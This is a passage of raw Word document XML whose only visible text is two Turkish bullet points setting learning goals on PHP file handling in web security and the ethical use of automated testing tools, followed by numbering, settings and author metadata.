          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:t>Web güvenliğinde PHP dosya işleme yapısına dair farkındalık kazanma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632F3EFA" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:t>Otomatize test araçlarının etik kullanımı hakkında bilgi edinme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716EFB1E" w14:textId="77777777" w:rsidR="002D598C" w:rsidRDefault="002D598C"/>
    <w:sectPr w:rsidR="002D598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CA737B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26CA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1615A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D38C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F7F7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20F8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436C29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D6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209421">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="888877842">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="646281219">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="18575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6D"/>
    <w:rsid w:val="002D598C"/>
    <w:rsid w:val="008F2518"/>
    <w:rsid w:val="00F8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0B28"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{51674C03-D63A-4FB7-9AEB-325561F4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834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834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34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34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34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34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34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34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34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834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834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34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346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346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346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346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346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346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834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83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834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834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834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8346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8346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8346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834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8346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834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1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DC35-3EE1-4EBD-A172-09CAC61E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 Özaydoğdu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bahadır Özaydoğdu</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-04T11:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-04T11:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>